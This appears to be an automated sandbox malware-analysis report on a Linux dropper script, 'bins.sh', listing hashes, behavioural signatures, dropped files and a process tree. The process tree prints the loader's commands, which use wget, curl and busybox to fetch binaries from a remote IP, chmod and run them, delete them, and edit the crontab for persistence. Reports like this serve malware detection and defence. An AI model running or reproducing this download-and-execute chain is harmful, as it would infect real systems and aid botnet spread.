Analysis
-
max time kernel
147s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
09-11-2024 07:14
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
acf9f575ad4baba7d6272ee313fb67e5
-
SHA1
8eeb94b3ee523a0d71cd2d8c1d5931fcde651e1a
-
SHA256
29b6fbf8520e38ee858951211cf8d6364128b9e1a351e9fcc96cf4dc06c45e87
-
SHA512
13a836bc239e2e1ccc70a558add24a0e74bac3382834b06489b8a316519a5376874cde608c0546de15bcd6aebd9c903089a751b52d7d40ad4a0f2cd6549b6c3d
-
SSDEEP
96:yTPLN/mDiM57xKWeDvfo4458rr4cNXpfCT/invORL57RE684cN3KWeDvfJu4458L:cPRWiM3KWevfnKWevfP
Malware Config
Signatures
-
Contacts a large (2122) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodpid process 1517 chmod 1524 chmod 1531 chmod 1510 chmod -
Executes dropped EXE 4 IoCs
Processes:
XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8BokqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVyyisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2Cioc pid process /tmp/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa 1511 XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa /tmp/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B 1518 7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B /tmp/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy 1525 okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy /tmp/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C 1532 yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C -
Renames itself 1 IoCs
Processes:
yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2Cpid process 1533 yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.K46dZ3 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2Cdescription ioc process File opened for reading /proc/1828/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1308/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1502/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1556/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/15/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/178/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1547/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1741/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1646/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/137/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/463/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1584/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1685/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1763/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/435/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/721/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1635/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1675/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1698/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1625/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1580/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1650/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1664/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1679/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1682/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1548/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1629/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1094/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1595/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/5/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1027/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1693/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1701/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1377/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1554/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1564/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/957/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1673/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1723/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/449/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1496/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1771/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1590/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1758/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1819/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/530/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1716/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1751/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1835/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/115/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/161/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1181/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1551/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1623/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1718/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1749/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1706/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1713/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1804/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1807/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/12/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/165/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1143/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C File opened for reading /proc/1152/cmdline yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxwgetbusyboxwgetcurlbusyboxcurlcurlbusyboxcurlwgetwgetdescription ioc process File opened for modification /tmp/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa busybox File opened for modification /tmp/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B wget File opened for modification /tmp/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B busybox File opened for modification /tmp/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy wget File opened for modification /tmp/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy curl File opened for modification /tmp/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy busybox File opened for modification /tmp/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C curl File opened for modification /tmp/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa curl File opened for modification /tmp/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C busybox File opened for modification /tmp/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B curl File opened for modification /tmp/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C wget File opened for modification /tmp/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1502
-
/bin/rm/bin/rm bins.sh2⤵PID:1503
-
/usr/bin/wgetwget http://216.126.231.240/bins/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa2⤵
- Writes file to tmp directory
PID:1504 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa2⤵
- Writes file to tmp directory
PID:1508 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa2⤵
- Writes file to tmp directory
PID:1509 -
/bin/chmodchmod 777 XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa2⤵
- File and Directory Permissions Modification
PID:1510 -
/tmp/XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa./XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa2⤵
- Executes dropped EXE
PID:1511 -
/bin/rmrm XJN6e2qWTwrsN6CGouvz9xCbwk6JLs7Ypa2⤵PID:1513
-
/usr/bin/wgetwget http://216.126.231.240/bins/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B2⤵
- Writes file to tmp directory
PID:1514 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B2⤵
- Writes file to tmp directory
PID:1515 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B2⤵
- Writes file to tmp directory
PID:1516 -
/bin/chmodchmod 777 7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B2⤵
- File and Directory Permissions Modification
PID:1517 -
/tmp/7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B./7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B2⤵
- Executes dropped EXE
PID:1518 -
/bin/rmrm 7u6S28C4pr5jbcrCyfbompYOYtt9J5kk8B2⤵PID:1520
-
/usr/bin/wgetwget http://216.126.231.240/bins/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy2⤵
- Writes file to tmp directory
PID:1521 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy2⤵
- Writes file to tmp directory
PID:1522 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy2⤵
- Writes file to tmp directory
PID:1523 -
/bin/chmodchmod 777 okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy2⤵
- File and Directory Permissions Modification
PID:1524 -
/tmp/okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy./okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy2⤵
- Executes dropped EXE
PID:1525 -
/bin/rmrm okqyOtgxZhF83wMW7RGhqlWYNLmlLxMnVy2⤵PID:1527
-
/usr/bin/wgetwget http://216.126.231.240/bins/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C2⤵
- Writes file to tmp directory
PID:1528 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C2⤵
- Writes file to tmp directory
PID:1529 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C2⤵
- Writes file to tmp directory
PID:1530 -
/bin/chmodchmod 777 yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C2⤵
- File and Directory Permissions Modification
PID:1531 -
/tmp/yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C./yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1532 -
/bin/shsh -c "crontab -l"3⤵PID:1534
-
/usr/bin/crontabcrontab -l4⤵PID:1535
-
/bin/shsh -c "crontab -"3⤵PID:1536
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1537 -
/bin/rmrm yisSbqHPG70HTvNT7Rhf8FCAcnDFB8Ge2C2⤵PID:1539
-
/usr/bin/wgetwget http://216.126.231.240/bins/bE1wZrR3LkaqAP5wPtbqf6sNNmp0d9shLL2⤵PID:1542
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
107KB
MD5eb9c3a0de91fcf16ba17cb24608df68c
SHA109d95a7d70d5e115d103be51edff7c498d272fac
SHA256dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47
SHA5129e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
117KB
MD5849fa04ef88a8e8de32cb2e8538de5fe
SHA1c768af29fe4b6695fff1541623e8bbd1c6f242f7
SHA2568bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579
SHA5122d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
210B
MD5a132196ae4d569319532ad392329f212
SHA1837da12055a7d99b6a2d08b59c2650503fdf4fba
SHA256e4c2d190b56613e31b0b376525e89a6b956b1c84fd07f94ba206cca99cb2dfba
SHA5123572470e974a9d748dbf639d2197799676c98a9e344de9ff401c063df4bcb8cec3da202fd8c86d0ef732a635a105467acc95ea39c4e1b9e588c6712cdb0f9baa